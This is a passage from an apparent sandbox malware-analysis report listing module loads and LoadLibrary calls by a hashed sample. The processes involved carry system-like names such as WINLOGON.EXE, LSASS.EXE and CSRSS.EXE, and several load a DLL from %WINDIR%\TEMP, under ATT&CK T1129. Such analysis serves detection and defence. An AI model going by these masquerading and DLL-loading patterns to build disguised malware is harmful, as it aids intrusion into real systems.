\"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ed0000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 779b0000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 75630000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 74050000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 76f20000\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 76f20000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 76180000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 77140000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74600000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 770b0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74280000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76f20000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 772a0000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 76e70000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74ba0000\n \"IExplorer.exe\" loaded module \"USER32\" at base 77760000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755e0000\n \"D3_08.exe\" loaded module \"SXS.DLL\" at base 75640000\n \"D3_08.exe\" loaded module \"CRYPTSP.DLL\" at base 75140000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75630000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 76f20000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 779b0000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 76180000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 77140000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74600000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 77440000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 770b0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74280000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74ba0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76f20000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 772a0000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 76e70000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 77760000\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 76f20000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755e0000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 75140000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ed0000\n \"D3_08.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74530000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74530000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77440000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 75640000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75140000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ed0000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 779b0000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75630000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74050000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76f20000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 76180000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 77140000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74600000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 770b0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74280000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ba0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76f20000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 772a0000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76e70000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 77760000\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 76f20000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755e0000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71130000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bae0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71130000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bae0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71130000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 76f20000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 77440000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 75640000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 75140000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ed0000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 779b0000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75630000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 76f20000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 76180000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 77140000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74600000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 770b0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76f20000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 772a0000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 76e70000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74280000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74ba0000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 77760000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755e0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bae0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74530000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71130000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bae0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74530000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 75640000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 75640000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75140000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ed0000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 779b0000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75630000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 76f20000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 76180000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 77140000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74600000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77440000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 770b0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74280000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76f20000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 772a0000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 76e70000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ba0000\n \"LSASS.EXE\" loaded module \"USER32\" at base 77760000\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 76f20000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755e0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71130000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74530000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74530000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77440000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 75640000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75140000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ed0000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 779b0000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75630000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74050000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 76f20000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 76180000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 77140000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74600000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 770b0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74280000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76f20000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 772a0000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 76e70000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74ba0000\n \"SMSS.EXE\" loaded module \"USER32\" at base 77760000\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 76f20000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755e0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71130000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bae0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bae0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005136)\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005136)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005404)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005404)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005412)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005412)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005436)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005436)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005436)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005436)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005436)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005436)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005436)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005436)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005436)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005620)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005620)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005156)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005324)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005324)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005244)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005244)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005244)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005244)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005244)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005244)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005244)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005244)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005244)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005244)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005628)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005348)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005364)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005364)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005916)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005916)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005916)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005916)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005916)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005916)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005808)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter 